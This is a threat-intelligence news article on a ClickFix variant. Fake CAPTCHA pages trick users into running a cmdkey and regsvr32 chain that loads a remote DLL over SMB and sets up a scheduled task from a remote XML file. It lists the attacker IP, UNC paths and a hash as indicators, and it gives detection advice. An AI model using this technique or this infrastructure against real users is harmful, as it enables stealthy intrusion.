ClickFix Attack Replaces PowerShell with Cmdkey and Remote Regsvr32
Key Takeaways A new variant of the ClickFix attack chain has emerged, abandoning PowerShell in favor of native Windows tools. The attack leverages cmdkey and regsvr32 to silently deliver and execute...
Key Takeaways
- A new variant of the ClickFix attack chain has emerged, abandoning PowerShell in favor of native Windows tools.
- The attack leverages
cmdkeyandregsvr32to silently deliver and execute a remote payload without dropping files to disk. - Discovered by CyberProof, this technique employs social engineering with fake CAPTCHA pages to trick users into executing a multi-stage command.
- The attack establishes persistence by creating a scheduled task that retrieves its definition from a remote XML file, making it stealthy and adaptable.
- Organizations should enhance monitoring for suspicious activity involving these legitimate Windows utilities and reinforce user education against social engineering tactics.
ClickFix Evolves: PowerShell Replaced by Native Windows Tools for Stealthy Payload Delivery
A sophisticated evolution of the ClickFix attack, dubbed “ClickFix v2” by researchers, has been observed in the wild. This latest iteration marks a significant strategic shift, moving away from PowerShell to exploit a chain of legitimate Windows utilities for payload delivery and execution. The new technique allows attackers to silently infiltrate systems without leaving traditional forensic traces on disk, posing a substantial challenge to conventional detection mechanisms.
Table Of Content
ClickFix campaigns have historically relied on social engineering to coerce users into running malicious commands. Earlier versions typically involved victims pasting commands, often obtained from deceptive CAPTCHA pages, into the Windows Run dialog. These commands would then invoke PowerShell to download and execute a malicious payload. The efficacy of this method has made ClickFix a persistent concern for cybersecurity professionals.
The CyberProof Threat Research Team, comprising Deepak Nayak, Kithu Shajil, and Veena Sagar, identified this novel ClickFix variant. Their findings, published on April 22, 2026, highlight the complete abandonment of PowerShell in this updated attack. This change significantly hinders detection by security tools configured to flag PowerShell-based malicious activity.
CyberProof’s researchers noted that the updated campaign employs a concise command chain. This chain meticulously stores credentials, retrieves a remote Dynamic Link Library (DLL), and executes it stealthily using trusted Windows components. By “living off the land” and exclusively utilizing built-in Windows tools (LOLBins), attackers can seamlessly blend their malicious operations with normal system behavior, thereby making detection considerably more complex.
This strategic pivot has profound implications for organizations relying heavily on behavioral detection. Traditional security solutions designed to detect suspicious file drops or unusual process executions might fail to trigger alerts, as the attack leverages only legitimate system binaries. A single, socially engineered command executed through the Windows Run dialog is sufficient to initiate a multi-stage attack chain, establish persistence on the compromised machine, and connect back to attacker-controlled infrastructure. This low barrier to entry makes the threat accessible to a broad spectrum of potential victims, from individual users to corporate entities.
The campaign’s effectiveness is amplified by the minimal user interaction required for infection: a simple paste and execution of a pre-loaded command. The attackers meticulously craft the initial phishing pages, often impersonating legitimate Cloudflare CAPTCHA screens, to build trust and encourage victims to perform the malicious action.
Inside the Infection Mechanism
The attack sequence begins when a user navigates to a phishing page disguised as a CAPTCHA verification prompt. The page instructs the victim to open the Windows Run dialog (Win + R), paste a provided command, and press Enter. The observed command initiates cmd.exe and orchestrates two primary actions.

First, the cmdkey utility is used to store credentials for the remote IP address 151.245.195[.]142 under the username “guest.” Immediately following, regsvr32 is invoked to silently load a DLL, specifically “demo.dll,” from the attacker’s Server Message Block (SMB) share via a Universal Naming Convention (UNC) path. A “REM” comment embedded within the command, stating “I am not a robot,” further attempts to mask the malicious intent, portraying it as a genuine verification step.

Upon execution of the remote DLL by regsvr32, its DllRegisterServer export triggers a hidden CreateProcessA call. This call establishes a scheduled task named “RunNotepadNow” using the Windows Task Scheduler. Crucially, the task definition itself is not stored locally on the infected machine but is dynamically retrieved from a remote XML file hosted on the attacker’s server. This method allows the attackers to modify their second-stage payload at any time without needing to redeploy the initial DLL, providing long-term persistence with minimal on-host forensic artifacts.

To counter this advanced threat, security teams must implement enhanced monitoring strategies. This includes vigilance over cmdkey usage, particularly when associated with external IP addresses, and careful scrutiny of regsvr32 processes loading remote DLLs via UNC paths. Robust alerting should be configured for chained command execution originating from cmd.exe, and any Task Scheduler activity referencing remote XML files warrants immediate and thorough review. Network-level restrictions or stringent monitoring of outbound SMB and UNC access are also critical. Furthermore, continuous user education remains paramount to equip employees with the ability to recognize and avoid ClickFix-style social engineering attempts before they inadvertently execute malicious commands.
Indicators of Compromise (IOCs):
- 151[.]245.195.142
- \151[.]245.195.142hidemo.dll
- \151[.]245.195.142hi777.xml
- SHA256: b2d9a99de44a7cd8faf396d0482268369d14a315edaf18a36fa273ffd5500108
What You Should Do
- Enhance Endpoint Detection and Response (EDR) Rules: Configure EDR systems to detect unusual execution patterns involving
cmdkeyandregsvr32, especially when they interact with remote IP addresses or UNC paths. - Monitor for Chained Command Execution: Implement alerts for instances where
cmd.exeis used to chain multiple commands, particularly those involving credential storage or remote file loading. - Restrict Outbound SMB/UNC Traffic: Limit or strictly monitor outbound SMB and UNC access from endpoints to external IP addresses to prevent remote payload retrieval.
- Review Scheduled Task Creation: Scrutinize any new scheduled tasks, particularly those that retrieve their definitions or executables from remote XML files or network shares.
- Conduct Regular Security Awareness Training: Educate users about social engineering tactics, specifically those mimicking CAPTCHA pages, and emphasize the dangers of pasting or executing commands from untrusted sources.
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.



No Comment! Be the first one.